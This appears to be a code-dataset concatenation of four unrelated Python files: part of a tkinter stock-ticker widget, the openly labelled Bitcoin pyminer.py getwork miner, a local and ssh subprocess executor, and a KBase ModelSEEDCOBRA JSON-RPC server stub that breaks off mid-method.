mUpdateInterval = 10
#mWinIcon = "sw-small.ico"
mWinTitle = "Stock Watcher"
mDetailedWinTitle = "Detailed Info"
mIsMarketCLosed = False
# the main class for the function
class StocksInfoFetcher(object):
"""
Class of GetStocksInfo
"""
_instance = None
# overwrite the new method to creat a singleton
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(StocksInfoFetcher, cls).__new__(cls, *args, **kwargs)
return cls._instance
# initialize the class
def __init__(self):
self.mConfig = self.getConfiguration()
# read the configuration file
def getConfiguration(self):
with open(mConfFile) as configFile:
config = json.load(configFile)
return config[mConfSection]
# get http response
def getHttpResponse(self, url):
content = ""
try:
response = urlopen(url)
content = response.read().decode('gb2312')
except:
pass
return str(content)
# fetch the stocks info
def getStocksInfo(self):
# the configuration is none
if not self.mConfig:
return
stocks = []
for index in range(len(self.mConfig)):
stocks.append(str(self.mConfig[index]['code']))
stockCodeNames = ','.join(stocks)
# print("Stocks: {}".format(stockCodeNames))
url = mRemoteStockUrl + stockCodeNames
# print("url: {}".format(url))
httpContent = self.getHttpResponse(url)
print("httpContent: {}".format(httpContent))
stocksInfoResp = httpContent.split(';')
# print(stocksInfoResp[1])
stocksInfoList = []
costIndex = 0
for stock in stocksInfoResp:
line = stock[4:-1]
kvlist = line.split('=')
if len(kvlist) < 2:
continue
# print(kvlist)
code = kvlist[0].split('_')[-1]
dataline = kvlist[1]
datalist = dataline.split(',')
# check whether the market is closed or not
if datalist[31] is not None:
time = datetime.datetime.strptime(datalist[31], '%H:%M:%S').time()
self.checkIsMarketClosed(time)
name = datalist[0][1:100]
lastclose = datalist[2]
current = datalist[3]
if (current > lastclose):
direction = mCharUp
styleTag = mUpTag
elif (current == lastclose):
direction = mCharEven
styleTag = mEvenTag
else:
direction = mCharDown
styleTag = mDownTag
percent = "{:.2f}".format((float(current) - float(lastclose)) / float(lastclose) * 100)
profit = 0
profitSign = mCharDraw
cost, takeprofit, stoploss = self.getOneStocMetrics(code)
if (cost != 0):
profit = "{:.2f}".format((float(current) - float(cost)) / float(cost) * 100)
if (float(profit) > takeprofit):
profitSign = mCharWinAlert
elif (float(profit) > 0.00):
profitSign = mCharWin
elif (float(profit) == 0.00):
profitSign = mCharDraw
elif (float(profit) < stoploss):
profitSign = mCharLoseAlert
else:
profitSign = mCharLose
oneStockContent = " | {} {} {}({}%) {}({}%) ".format(name, current, direction, percent, profitSign, profit)
#oneStockContent = " |{} {}%".format(name, percent)
stocksInfoList.append({'code': code, 'tag': styleTag, 'content': oneStockContent})
costIndex += 1
return stocksInfoList
def getOneStocMetrics(self, code):
for stock in self.mConfig:
if stock.get('code') == code:
return stock.get('cost'), stock.get('takeprofit') * 100 ,stock.get('stoploss') * 100
def checkIsMarketClosed(self, time):
if time < datetime.datetime.strptime('09:29:59', '%H:%M:%S').time() \
or (time > datetime.datetime.strptime('11:31:00', '%H:%M:%S').time() \
and time < datetime.datetime.strptime('12:59:59', '%H:%M:%S').time()) \
or time > datetime.datetime.strptime('15:01:00', '%H:%M:%S').time():
mIsMarketCLosed = True
else:
mIsMarketCLosed = False
class StocksController():
"""
Class StocksController, control the stock display
the scroll ticker
"""
# define the static variable
stockindex = 0
mStocks = []
mCodes = []
mContentLength = 0
mCurrentTicker = ''
def __init__(self):
self.loadMarket()
# the char index of one stock
self.index = 0
self.getStockCodes()
self.getContentLength()
def loadMarket(self):
# get the list of stocks [(code, tag, stock string),]
stocksInfoFetecher = StocksInfoFetcher()
StocksController.mStocks = stocksInfoFetecher.getStocksInfo()
def getStockCodes(self):
# fill the code, use as tag later
for stock in StocksController.mStocks:
code = stock.get('code')
if code not in StocksController.mCodes:
StocksController.mCodes.append(code)
def getContentLength(self):
contentLen = 0
for stock in StocksController.mStocks:
contentLen += len(stock.get('content'))
StocksController.mContentLength = contentLen
def getOneTicker(self):
self.mOneTicker = StocksController.mStocks[self.stockindex]
self.index = 0
if StocksController.stockindex + 1 == len(StocksController.mStocks):
StocksController.stockindex = 0
else:
StocksController.stockindex += 1
return self.mOneTicker.get('content')
def getNextCharacter(self):
if self.index == len(StocksController.mCurrentTicker):
StocksController.mCurrentTicker = self.getOneTicker()
self.index = 0
self.mCharacterSymbol = StocksController.mCurrentTicker[self.index:self.index + 1]
self.index += 1
return self.mCharacterSymbol
def getTag(self):
return self.mOneTicker.get('tag')
def getCode(self):
return self.mOneTicker.get('code')
class UpdateThread(threading.Thread):
"""
Class UpdateThread, subclass of Thread, handle the time to the next update of the stocks values
"""
def __init__(self):
self.mStocksController = StocksController()
threading.Thread.__init__(self)
def run(self):
time.sleep(mUpdateInterval)
self.mStocksController.loadMarket()
self.run()
class DisplayStockGUI(Frame):
"""
Class of tkinter.Frame subclass, Initializes the GUI
"""
def __init__(self, parent):
# use this flag to refresh the message
self.mMsgDispCount = 0
self.mMsgSize = 0
self.mFinalMsg = ''
Frame.__init__(self, parent)
self.parent = parent
# tags by code name
# creates an instance of the StocksController class for contents the the data
self.mStocksController = StocksController()
self.mCodes = self.mStocksController.mCodes
self.mPopupWin = False
self.mCurrentCode = ''
self.mCurrentImg = ''
self.mContentOffset = 0
self.mContentWidth = 0
self.initGUI()
self.scrollMsg()
# start the auto update threading
self.thread_updating = UpdateThread()
self.thread_updating.daemon = True
self.thread_updating.start()
def initGUI(self):
# changes the window icon
#self.parent.iconbitmap(mWinIcon)
self.parent.title(mWinTitle)
# content LabelFrame to show the ticker scrolling line of text
self.lblfr_1 = LabelFrame(self.parent)
self.lblfr_1.pack()
# Creates a bold font
self.bold_font = Font(family="Consolas", size=11)
# the scrolling line of Text for show the data
self.txt_ticker_widget = Text(self.lblfr_1, background='black', height=2, width=mWinWidth, wrap="none")
self.txt_ticker_widget.pack(side=TOP, fill=X, expand=True)
self.txt_ticker_widget.tag_configure(mUpTag, foreground="red", font=self.bold_font)
self.txt_ticker_widget.tag_configure(mDownTag, foreground="green", font=self.bold_font)
self.txt_ticker_widget.tag_configure(mEvenTag, foreground="white", font=self.bold_font)
# self.txt_ticker_widget.tag_configure('sh000001', background="yellow")
# self.txt_ticker_widget.tag_configure('sz002229', background="blue")
# self.txt_ticker_widget.tag_configure('sh600030', background="white")
self.txt_ticker_widget.bind("<Enter>", self.onMouseEnter)
self.txt_ticker_widget.bind('<Motion>', self.onMouseMove)
self.txt_ticker_widget.bind("<Leave>", self.onMouseLeave)
def onMouseMove(self, event):
code = self.getCodeOnMouseOver(event)
self.popUpStocksDetailedInfo(code)
def onMouseEnter(self, event):
global mOnMouseEnter
mOnMouseEnter = True
def onMouseLeave(self, event):
global mOnMouseEnter
mOnMouseEnter = False
self.hidePopupWin()
def hidePopupWin(self):
if self.mPopupWin:
self.mPopupWin.destroy()
self.mPopupWin = False
def scrollMsg(self):
global mOnMouseEnter
if not mOnMouseEnter:
self.txt_ticker_widget.configure(state=NORMAL)
# if we are at the begin of the loop, we should clear the text
#if self.mContentOffset > self.mStocksController.mContentLength:
# self.txt_ticker_widget.delete(1.0)
#print(self.mStocksController.getNextCharacter())
#self.txt_ticker_widget.insert(END, self.mStocksController.getNextCharacter(),\
# (self.mStocksController.getTag(),self.mStocksController.getCode()))
#self.txt_ticker_widget.see(END)
self.txt_ticker_widget.delete(1.0,END)
try:
self.txt_ticker_widget.insert(INSERT, self.mStocksController.getOneTicker(),\
(self.mStocksController.getTag(),self.mStocksController.getCode()))
except:
pass
self.txt_ticker_widget.see(END)
#self.mContentWidth = self.bold_font.measure(self.txt_ticker_widget.get("1.0", "end-1c"))
# print(self.mContentWidth)
# print(self.txt_ticker_widget.get("1.0", "end-1c"))
#self.mContentOffset += 1
self.txt_ticker_widget.configure(state=DISABLED)
self.txt_ticker_widget.after(mCharRefreshSpeed, self.scrollMsg)
def getCodeOnMouseOver(self, event):
# the index position of the total content
mousePos = event.widget.index("@%s,%s" % (event.x, event.y))
tmpCodes = self.getCodesFromTags(event)
for code in tmpCodes:
code['irange'] = list(event.widget.tag_ranges(code['code']))
# iterate them pairwise (start and end index)
for start, end in zip(code['irange'][0::2], code['irange'][1::2]):
# check if the tag matches the mouse click index
if event.widget.compare(start, '<=', mousePos) and event.widget.compare(mousePos, '<', end):
return code.get('code')
def getCodesFromTags(self, event):
tmpCodes = []
for tag in (event.widget.tag_names() and self.mCodes):
code = tag
tmpCodes.append({'code': code, 'irange': []})
return tmpCodes
def getRomotePicture(self, url):
fd = urlopen(url)
imageFile = io.BytesIO(fd.read())
fd.close()
return imageFile
def popUpStocksDetailedInfo(self, code):
if not code:
return
x = self.parent.winfo_rootx() - mPopWinLeftShift
y = self.parent.winfo_rooty() - mPopWinUpShift
ystr = "+{}".format(y)
if y < 0:
ystr = "+{}".format(self.parent.winfo_rooty() + 35)
if self.mPopupWin and code != self.mCurrentCode:
self.hidePopupWin();
if not self.mPopupWin:
x = self.parent.winfo_rootx() - mPopWinLeftShift
y = self.parent.winfo_rooty() - mPopWinUpShift
ystr = "+{}".format(y)
if y < 0:
ystr = "+{}".format(self.parent.winfo_rooty() + 35)
# creates a toplevel window
self.mPopupWin = Toplevel(self.parent)
# # Leaves only the label and removes the app window
self.mPopupWin.wm_overrideredirect(True)
self.mPopupWin.wm_geometry("{}x{}+{}{}".format(mPopWinWidth,mPopWinHeight, x, ystr))
# url = 'http://image.sinajs.cn/newchart/min/n/sh000001.gif'
# if (code != self.mCurrentCode or not self.mCurrentImg):
url = mRemoteStockImgUrl.format(code)
self.mCurrentImg = self.getRomotePicture(url)
self.mCurrentCode = code
origImgData = Image.open(self.mCurrentImg)
finalImage = ImageTk.PhotoImage(origImgData) # Keep a reference, prevent GC
Label(self.mPopupWin, image=finalImage).pack()
self.mPopupWin.mainloop()
root = Tk()
root.geometry('{}x{}-{}-{}'.format(mWinWidth, mMainWinHeight, mMainWinBottomLeftShift, mMainWinBottomUpShift))
root.attributes('-alpha', 0.8)
# border less
root.overrideredirect(1)
# top of all others windows
root.wm_attributes("-topmost", True)
# root.attributes("-toolwindow", 1)
root.resizable(0, 0)
# root.lift()
# make the window to stay above all other windows
DisplayStockGUI(root)
# hide
def autoHide():
while True:
localtime = time.localtime(time.time())
if localtime.tm_hour >= 9 and localtime.tm_hour < 15 :
root.deiconify()
else:
root.withdraw()
time.sleep(10)
t = threading.Thread(target=autoHide)
t.start()
root.mainloop()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 26966
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
process.py
|
import os
import json
import logging
import subprocess
import time
from multiprocessing import Process, Queue
logger = logging.getLogger(__name__)
class Loader:
def __init__(self):
self._files = []
self._classes = {}
self._modules = []
def get_modules(self):
return self._modules
def get_classes(self):
return self._classes
def get_files(self):
return self._files
def loading(self, root, file, full_path):
p = os.path.join(root, file)
if full_path:
file_path = os.path.abspath(p)
self._files.append(file_path)
else:
self._files.append(file)
def load_files(self, folder, file_begin_with, endswith=None, full_path=False):
for root, dirs, files in os.walk(folder):
for file in files:
if file.startswith(file_begin_with):
if endswith:
if file.endswith(endswith):
self.loading(root, file, full_path)
else:
self.loading(root, file, full_path)
break
return self._files
def load_classes(self, folder, file_begin_with, class_begin_with):
files = self.load_files(folder, file_begin_with)
files = [f.split('.')[0] for f in files if f.endswith('.py')]
self._modules = [__import__(f) for f in files]
for m in self._modules:
classes = [c for c in dir(m) if c.startswith(class_begin_with)]
if classes:
for c in classes:
self._classes[c] = getattr(m, c)
return self._classes
class Processor:
def __init__(self):
self.process = None
def start_process(self, args, queue, stop=False, timeout=60):
return_code = 0
out, err = '', None
try:
p = subprocess.Popen(args,
stdin = subprocess.PIPE,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
)
self.process = p
logger.debug('process started %s', p.pid)
if stop:
if self.stop_process(timeout):
out, err = p.communicate()
return_code = p.returncode
else:
return_code = -1
err = 'ERROR: Process not defined'
else:
logger.debug('process communicate %s', p.pid)
out, err = p.communicate()
return_code = p.returncode
except OSError:
return_code = -1
err = 'ERROR: exception OSError'
finally:
logger.debug('process finished %s', p.pid)
if return_code != 0:
queue_answer = err
logger.error(err)
else:
queue_answer = out
self.process = None
queue.put(return_code)
queue.put(queue_answer)
queue.put('STOP')
queue.close()
return return_code
def stop_process(self, timeout):
logger.debug('stopping process %s after %s', self.process.pid, timeout)
if self.process:
time.sleep(timeout)
self.process.kill()
logger.debug('Timeout for pid %s', self.process.pid)
self.process = None
return True
return False
class Multiprocessor:
def __init__(self):
self.processes = {}
self.processor = Processor()
def make_process(self, cmd, stop, timeout):
q = Queue()
p = Process(target=self.processor.start_process, args=(cmd, q, stop, timeout))
return (p,q)
def start_processes(self, cmds, stop, timeout):
self.processes = {}
for _id,cmd in cmds.items():
self.processes[_id] = self.make_process(cmd, stop, timeout)
logger.debug('Starting processes %s', self.processes)
for (p,q) in self.processes.values():
p.start()
def check_processes(self):
logger.debug("checking processes")
any_alive = True
while any_alive:
any_alive = any([p.is_alive() for (p,q) in self.processes.values()])
all_queued = all([not q.empty() for (p, q) in self.processes.values()])
time.sleep(0.05)
if all_queued and any_alive:
break
return True
def dump_queues(self, queue):
return_code = queue.get_nowait()
result = ""
for i in iter(queue.get_nowait, 'STOP'):
if type(i) is bytes:
i_dec = i.decode("utf-8")
else:
i_dec = i
result += i_dec
return return_code,result
def get_processes_queue(self):
outs = {}
for _id, (p, q) in self.processes.items():
try:
exitcode, _res = self.dump_queues(q)
except Exception as e:
logger.debug("Process id %s dump queue exception %s", _id, e)
else:
p.terminate()
outs[_id] = (exitcode, _res)
return outs
def run(self, cmds, stop=False, timeout=60):
self.start_processes(cmds, stop, timeout)
_outputs = {}
if self.check_processes():
_outputs = self.get_processes_queue()
return _outputs
class Executor:
def __init__(self):
self._multi_processor = Multiprocessor()
self._exe = {'py': '/usr/bin/python3',
'sh': 'sh',
'pl': 'perl',
'java': 'java'}
def _parse_cmd(self, cmd):
if type(cmd) is list:
cmd = [str(c) for c in cmd]
else:
cmd = cmd.split(' ')
return cmd
def _parse_type(self, cmd):
type = 'sh'
_cmd = self._parse_cmd(cmd)
_cmd = _cmd[0]
if len(_cmd.split('.')) > 1:
if _cmd.split('.')[-1] in self._exe:
type = self._exe[_cmd.split('.')[-1]]
else:
type = None
else:
type = None
return type
def _cmd_exec_local(self, cmd):
# logger.debug('_exec_local')
_type = self._parse_type(cmd)
if type(cmd) is list:
cmd = [str(c) for c in cmd]
cmd = ' '.join(cmd)
if _type:
cmd = _type + ' ' + cmd
cmd = self._parse_cmd(cmd)
logger.debug(cmd)
return cmd
def _cmd_exec_remote(self, cmd, host, user):
# logger.debug('_exec_remote')
ssh = ''.join(['ssh ', user, '@', host])
_type = self._parse_type(cmd)
if type(cmd) is list:
cmd = [str(c) for c in cmd]
cmd = ' '.join(cmd)
if _type:
cmd = ssh + _type + ' < ' + cmd
else:
cmd = ssh + ' ' + cmd
cmd = self._parse_cmd(cmd)
logger.debug(cmd)
return cmd
def _output(self, ret, out):
if ret == 0:
return 'ok',out
else:
return None,out
def _build_cmd(self, cmds, remote=False, host=None, user=None):
built_cmds = {}
for _id, cmd in cmds.items():
if remote and host and user:
_cmd = self._cmd_exec_remote(cmd, host, user)
else:
_cmd = self._cmd_exec_local(cmd)
built_cmds[_id] = _cmd
return built_cmds
def _parse_outputs(self, outputs):
parsed_outs = {}
for _id,output in outputs.items():
(ret, out) = output
# logger.debug('ret %s, output %s', ret, out)
parsed_outs[_id] = self._output(ret, out)
return parsed_outs
def run(self, cmds, **kwargs):
stop = False
timeout = 0
remote = False
host = None
user = None
if 'stop' in kwargs:
stop = kwargs['stop']
if 'timeout' in kwargs:
timeout = kwargs['timeout']
if 'remote' in kwargs:
remote = kwargs['remote']
if 'host' in kwargs and 'user' in kwargs:
host = kwargs['host']
user = kwargs['user']
else:
logger.debug("No user or host provided for remote exec")
raise Exception
_built_cmds = self._build_cmd(cmds, remote=remote, host=host, user=user)
_outputs = self._multi_processor.run(_built_cmds, stop, timeout)
_outs = self._parse_outputs(_outputs)
return _outs
class Actuator(Executor):
def __init__(self):
Executor.__init__(self)
self.stimulus = {}
self.evals = {}
self.acts = {}
self._cfg = None
self._loader = Loader()
def get_acts(self):
return self.acts
def cfg(self, cfg):
self._cfg = cfg
self._load_acts()
def _load_acts(self):
files = self._loader.load_files(
self._cfg.get("folder"),
self._cfg.get("prefix"),
self._cfg.get("suffix"),
self._cfg.get("full_path")
)
for file in files:
cmd = {1:[file, '--info']}
output = self.run(cmd)
for _, (ack, out) in output.items():
if ack:
act_info = json.loads(out)
if act_info.get('id', None):
act_info['file'] = file
self.acts[act_info['id']] = act_info
else:
logger.debug("Could not load act %s", cmd)
def _parse_act_args(self, stimulus, act):
stimulus_args = stimulus.get('parameters')
args = []
for k,v in stimulus_args.items():
if v and str(v) != 'None':
arg = '--'+k
args.append(arg)
args.append(v)
return args
def _parse_act_cmd(self, stimulus):
act_cmd = None
if stimulus['id'] in self.acts:
act = self.acts[stimulus['id']]
args = self._parse_act_args(stimulus, act)
act_cmd = [act['file']]
act_cmd.extend(args)
return act_cmd
def _load_instruction(self, inst):
actions = inst.get('actions')
for _,action in actions.items():
self.stimulus[action.get('id')] = action.get('stimulus')
def _exec_stimulus(self):
self.evals = {}
act_cmds = {}
for _id,stimulus in self.stimulus.items():
act_cmds[_id] = self._parse_act_cmd(stimulus)
if act_cmds:
outputs = self.run(act_cmds)
self._check_outputs(outputs)
def _check_outputs(self, outputs):
for _id, output in outputs.items():
ack, out = output
stm = self.stimulus[_id]
runner_id = stm.get('id')
if ack:
self.evals[_id] = (True, runner_id, json.loads(out))
else:
self.evals[_id] = (False, runner_id, out)
def act(self, instruction):
self.stimulus = {}
self._load_instruction(instruction)
self._exec_stimulus()
return self.evals
|
ModelSEEDCOBRAServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from ModelSEEDCOBRA.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ModelSEEDCOBRA'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from ModelSEEDCOBRA.ModelSEEDCOBRAImpl import ModelSEEDCOBRA # noqa @IgnorePep8
impl_ModelSEEDCOBRA = ModelSEEDCOBRA(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
